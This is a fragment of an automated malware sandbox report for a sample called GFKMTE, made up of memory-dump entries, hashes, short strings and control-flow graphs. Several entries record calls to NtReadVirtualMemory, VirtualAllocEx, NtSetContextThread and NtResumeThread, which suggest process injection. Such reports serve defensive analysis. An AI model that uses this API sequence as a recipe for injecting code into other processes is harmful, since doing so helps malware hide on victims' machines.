                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryReadVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2834387570-0
                                                                                                                                                  • Opcode ID: 76c901c52d05df259d03f20c1f433a128a5caed18eca5d7e78e493173ccf5e11
                                                                                                                                                  • Instruction ID: c2357d81cb06a7530a81e1473286aea381bfea603d5969f077228401482a7f15
                                                                                                                                                  • Opcode Fuzzy Hash: 76c901c52d05df259d03f20c1f433a128a5caed18eca5d7e78e493173ccf5e11
                                                                                                                                                  • Instruction Fuzzy Hash: 7A41CDB9D00258DFCF10DFA9D880AEEFBB1BB49310F10942AE815B7240D735A945CF58
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 05089D52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryReadVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2834387570-0
                                                                                                                                                  • Opcode ID: b1bd14eb0cc0c1f75264ca2e8630510324a5d56f80812e87103e947a75a0146b
                                                                                                                                                  • Instruction ID: 5c69f463497b04c09e37f8f3219d9a22180a8459666851678bb6d0dd210937f5
                                                                                                                                                  • Opcode Fuzzy Hash: b1bd14eb0cc0c1f75264ca2e8630510324a5d56f80812e87103e947a75a0146b
                                                                                                                                                  • Instruction Fuzzy Hash: E441BAB8D04258DFCF10DFAAD880AEEFBB1BB49310F10942AE815B7240C735A945CF68
                                                                                                                                                  APIs
                                                                                                                                                  • NtSetContextThread.NTDLL(?,?), ref: 0508A62F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                  • Opcode ID: a81196fd8196ae1690f068168ed6c262f6a08d9cc49337781972048a0b819cd6
                                                                                                                                                  • Instruction ID: 43b8fbadfd8ae80e63951c89a5acb10f15f16eff069264fcf3f443af76b00518
                                                                                                                                                  • Opcode Fuzzy Hash: a81196fd8196ae1690f068168ed6c262f6a08d9cc49337781972048a0b819cd6
                                                                                                                                                  • Instruction Fuzzy Hash: 6141BCB4D012589FDB10DFAAD985AEEFBF1BB48320F14802AE415B7240C739A946CF94
                                                                                                                                                  APIs
                                                                                                                                                  • NtSetContextThread.NTDLL(?,?), ref: 0508A62F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                  • Opcode ID: 3590918027d9dde087dd75f8776f7d5db14dbf74b1f2701a697b64bd5e876a4f
                                                                                                                                                  • Instruction ID: 259fd4170435c98420b396a94bad135582198f8a8933902060566da8a253697d
                                                                                                                                                  • Opcode Fuzzy Hash: 3590918027d9dde087dd75f8776f7d5db14dbf74b1f2701a697b64bd5e876a4f
                                                                                                                                                  • Instruction Fuzzy Hash: 0331BBB4D012589FDB10DFAAD885AEEFBF1BB48320F14802AE415B7240C738A945CF54
                                                                                                                                                  APIs
                                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 0508A291
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 15c6e789a15b20bf015acadf37af16c939d61dd9268eaeeb526c0e72c9586b65
                                                                                                                                                  • Instruction ID: 3a3c0170497a42221eb9714eb043e444682f00034b3c2d9ebd5ae1a1327df820
                                                                                                                                                  • Opcode Fuzzy Hash: 15c6e789a15b20bf015acadf37af16c939d61dd9268eaeeb526c0e72c9586b65
                                                                                                                                                  • Instruction Fuzzy Hash: 6A31AAB9D012189FCB20DFA9E981A9EFBF1FB59310F14942AE815B7240D735A942CF94
                                                                                                                                                  APIs
                                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 0508A291
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 25ee435e6548875a25ae449a2f64bcfc3b1e50d777b99469b4c4011cb5239bd8
                                                                                                                                                  • Instruction ID: e875c89bddf23cfdc7a2e6d495da627607fe6cd2c85dca7497d5c6bb52e36338
                                                                                                                                                  • Opcode Fuzzy Hash: 25ee435e6548875a25ae449a2f64bcfc3b1e50d777b99469b4c4011cb5239bd8
                                                                                                                                                  • Instruction Fuzzy Hash: E931BBB4D012189FCB20DFA9D981A9EFBF1BB49310F10942AE815B7340C735A942CF94
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 3/^
                                                                                                                                                  • API String ID: 0-2478644769
                                                                                                                                                  • Opcode ID: 6ec3bb15075aabb64ddf9fe2841b79199c4ba2598528d027d3ce0aad90f55a0c
                                                                                                                                                  • Instruction ID: 55554d9b60d16306a5c834077cc6be02a0ce701728dcd47fe8d56ee42c3da0ea
                                                                                                                                                  • Opcode Fuzzy Hash: 6ec3bb15075aabb64ddf9fe2841b79199c4ba2598528d027d3ce0aad90f55a0c
                                                                                                                                                  • Instruction Fuzzy Hash: 6EE10974E042198FDB14DFA9C590AAEFBB2FF89304F288169E454AB355D731AD42CF60
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: a203cb12fee0d238f2a0e7097d3488d769437026ef36956f0286b145c88c0908
                                                                                                                                                  • Instruction ID: 39e3890b798c3ab4cebeead972a1b74258199774df2b9dc4638667c468867fa5
                                                                                                                                                  • Opcode Fuzzy Hash: a203cb12fee0d238f2a0e7097d3488d769437026ef36956f0286b145c88c0908
                                                                                                                                                  • Instruction Fuzzy Hash: 9051F6B1E002188FEB58DF6AC85179EBBB3BF89300F14C0A9C54DAB255DB305A85CF51
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 4a144a58c97c38c5f8120584b6765a30518dcdafcfb7bc790c59473fd2de78ca
                                                                                                                                                  • Instruction ID: c1f9b9b2447a99c07e3b4bc10c056c14fe5bb853933cf73900c1151c15febc61
                                                                                                                                                  • Opcode Fuzzy Hash: 4a144a58c97c38c5f8120584b6765a30518dcdafcfb7bc790c59473fd2de78ca
                                                                                                                                                  • Instruction Fuzzy Hash: 4751EAB1E002188FEB58DF6AC85179EBBB3BFC9300F14C0A9D54DAB255DB345A858F51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1143 298b248-298b26b 1144 298b26d 1143->1144 1145 298b272-298b331 call 29800e4 call 298b899 1143->1145 1144->1145 1154 298b36e-298b372 1145->1154 1155 298b333-298b36b 1154->1155 1156 298b374-298b3e6 call 29800f4 call 298bdd8 1154->1156 1155->1154 1164 298b3ec-298b3f6 1156->1164
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 1093 2981000-2981023 1095 298102a-29810e9 call 29800e4 call 2981651 1093->1095 1096 2981025 1093->1096 1105 2981126-298112a 1095->1105 1096->1095 1106 29810eb-2981123 1105->1106 1107 298112c-298119e call 29800f4 call 2981b91 1105->1107 1106->1105 1115 29811a4-29811ae 1107->1115
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 1118 2984ca0-2984cc3 1120 2984cca-2984d89 call 29800e4 call 29852f1 1118->1120 1121 2984cc5 1118->1121 1130 2984dc6-2984dca 1120->1130 1121->1120 1131 2984d8b-2984dc3 1130->1131 1132 2984dcc-2984e3e call 29800f4 call 2985c38 1130->1132 1131->1130 1140 2984e44-2984e4e 1132->1140
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 1268 2984c90-2984c9e 1269 2984ca0-2984ca1 1268->1269 1270 2984ca2-2984cc3 1268->1270 1269->1270 1271 2984cca-2984d89 call 29800e4 call 29852f1 1270->1271 1272 2984cc5 1270->1272 1281 2984dc6-2984dca 1271->1281 1272->1271 1282 2984d8b-2984dc3 1281->1282 1283 2984dcc-2984e3e call 29800f4 call 2985c38 1281->1283 1282->1281 1291 2984e44-2984e4e 1283->1291
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0508A3B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0508A3B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +
                                                                                                                                                  • API String ID: 0-1750050401
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +
                                                                                                                                                  • API String ID: 0-1750050401
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 3/^
                                                                                                                                                  • API String ID: 0-2478644769
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 04363764facbd6521f8f5ed216c8dd6ffb40e31fc97e9c8c09920024d5dfd879
                                                                                                                                                  • Instruction ID: f5d2d54212217dcd8241ade6c57e68a1e5266807314a70bfc5d3946963afc51f
                                                                                                                                                  • Opcode Fuzzy Hash: 04363764facbd6521f8f5ed216c8dd6ffb40e31fc97e9c8c09920024d5dfd879
                                                                                                                                                  • Instruction Fuzzy Hash: C221B6B4E002099FCB84DFA9C591AAEBBF1EF49300F6581A9D918E7351D770AE41CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d03f0d79cbe420ce8554ac40b2391c5b60bca9714792944dff20ceb1f06e37ce
                                                                                                                                                  • Instruction ID: 78b52bdb0247784cc8eede382e67bc0a726dfb3375b6547796f9c87eee19fcf8
                                                                                                                                                  • Opcode Fuzzy Hash: d03f0d79cbe420ce8554ac40b2391c5b60bca9714792944dff20ceb1f06e37ce
                                                                                                                                                  • Instruction Fuzzy Hash: A8118E71D002599FDB04EFA9D844AEEBBBAFF88310F48C126D510AB241D730A895CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3198565d28b5f4718b90ca61e01a8e4a6c4c03aafc9c6554cf6a750547ce6c3f
                                                                                                                                                  • Instruction ID: a63005e2ba3405585e10cb7a4141910a83720e0b59820af8605e550ed217b3ea
                                                                                                                                                  • Opcode Fuzzy Hash: 3198565d28b5f4718b90ca61e01a8e4a6c4c03aafc9c6554cf6a750547ce6c3f
                                                                                                                                                  • Instruction Fuzzy Hash: 861167B4E002099FCB44DF99D581AAEBBF1FF48300F608569D918A7755D7709E41CF91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2de2d8ef335125a79a50f0751fc740f373fbb7ee6ae424b4002c01819c328b8c
                                                                                                                                                  • Instruction ID: c034df3504c24f59edf49c7ef9a60692fb872f36a798bd2d706a63394447df8a
                                                                                                                                                  • Opcode Fuzzy Hash: 2de2d8ef335125a79a50f0751fc740f373fbb7ee6ae424b4002c01819c328b8c
                                                                                                                                                  • Instruction Fuzzy Hash: 9D1186B4E002099FCB44DFA9C181AAEBBF1BF48300F6185A5D918A7715D770AA41CFA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ca769b0e65095047f1a295ca1c6e7f8843426461b371760f75ded108410c9102
                                                                                                                                                  • Instruction ID: 1a769fbd0a2e31babaad21a39ee40902e745f26a046b145f094424e2a17e8f76
                                                                                                                                                  • Opcode Fuzzy Hash: ca769b0e65095047f1a295ca1c6e7f8843426461b371760f75ded108410c9102
                                                                                                                                                  • Instruction Fuzzy Hash: AB1197B4E002099FCB44DF99C581AAEBBF1EF48300F608569D918A7755D770AE41CF91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f49556920e98f1ac472f6d8506868d14234ac2a6e2b863bcf6c705e17b8cd603
                                                                                                                                                  • Instruction ID: 6a312459e6ec1811a43d7ee35c0a780d47532e9a5afd53ee7197b5fec7e6f529
                                                                                                                                                  • Opcode Fuzzy Hash: f49556920e98f1ac472f6d8506868d14234ac2a6e2b863bcf6c705e17b8cd603
                                                                                                                                                  • Instruction Fuzzy Hash: 93010875A04248AFDB04DBA8C999A99BBF5EF49300F59C1D5D9089B262D7309E01DB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9f099b03e45025b4a2066107823c1b59f7683c6753dfacac5c56269d6edad832
                                                                                                                                                  • Instruction ID: 2f7cabe005b2dabf3717ccb9cf58f182391637d42f2ed186bd9bd0f91beaaf55
                                                                                                                                                  • Opcode Fuzzy Hash: 9f099b03e45025b4a2066107823c1b59f7683c6753dfacac5c56269d6edad832
                                                                                                                                                  • Instruction Fuzzy Hash: 6111E270E00208AFDB04DFA9D481A9EBBF1FF89314F1981A9C428A7311E730AA41CF80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: aee31ff6d512502642f849bfebec07f6cc26fc74756c4739587f626b263f2591
                                                                                                                                                  • Instruction ID: d9649ddb17ad3120060ad80b14e872db27341bfda0a7e7a5283067683936b39d
                                                                                                                                                  • Opcode Fuzzy Hash: aee31ff6d512502642f849bfebec07f6cc26fc74756c4739587f626b263f2591
                                                                                                                                                  • Instruction Fuzzy Hash: 9A011635A00208EFDB04EFA8CA99A9DBBF5EF49300F29C194D9089B361D6309E01DB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 679f883ba52149cc9eeb1b39cb8df9ee160546503b7b98101d83d81e58b30b38
                                                                                                                                                  • Instruction ID: 8106101e50be8c94186091f12eeac75b2d3fc45279a587c0c400fed0cd950a9b
                                                                                                                                                  • Opcode Fuzzy Hash: 679f883ba52149cc9eeb1b39cb8df9ee160546503b7b98101d83d81e58b30b38
                                                                                                                                                  • Instruction Fuzzy Hash: E40116B8D04218DFCB40EFA8D5586ADBBF0EB89304F1085AAD829A3350E7349E01CF42
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7380923ba8a1c18966ca624c957618d5ff461f95c7015bff4fdf745c1e23c462
                                                                                                                                                  • Instruction ID: 0cc894c1a24675c45f515e84390941ed9ce872037573f64139e243ed2cf7ad02
                                                                                                                                                  • Opcode Fuzzy Hash: 7380923ba8a1c18966ca624c957618d5ff461f95c7015bff4fdf745c1e23c462
                                                                                                                                                  • Instruction Fuzzy Hash: 90012839A00208EFDB05DFA8C688E59BFF5AF88300F6AC1D5E5089B3A1D630DE10DB41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c2bc4fe3cfafb8299c042913a41fa4c9861c3fea3ec9b4a5348ed648cbcc25ea
                                                                                                                                                  • Instruction ID: 282d3806b215aa758f0176302d1a31ce2263fca1a2be181e26deb268f38de0c1
                                                                                                                                                  • Opcode Fuzzy Hash: c2bc4fe3cfafb8299c042913a41fa4c9861c3fea3ec9b4a5348ed648cbcc25ea
                                                                                                                                                  • Instruction Fuzzy Hash: 44F08C70D08288DFDB05DB69E850A9ABBF5FF56300F5881A6D9009B222E3309E46DB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bc7785eebf121cac11a07e8964a3e0218c45fdddc44c33a38f16c7747796a83e
                                                                                                                                                  • Instruction ID: 0d330e27e0ccd9b8e8b5e92865aa86903becd76ac6dfcee15a94ee2c96c95339
                                                                                                                                                  • Opcode Fuzzy Hash: bc7785eebf121cac11a07e8964a3e0218c45fdddc44c33a38f16c7747796a83e
                                                                                                                                                  • Instruction Fuzzy Hash: 30F0C934A00108EFDB04DFA9C688A5DBBF5EF48300F65C194D9089B365D730DE10DB50
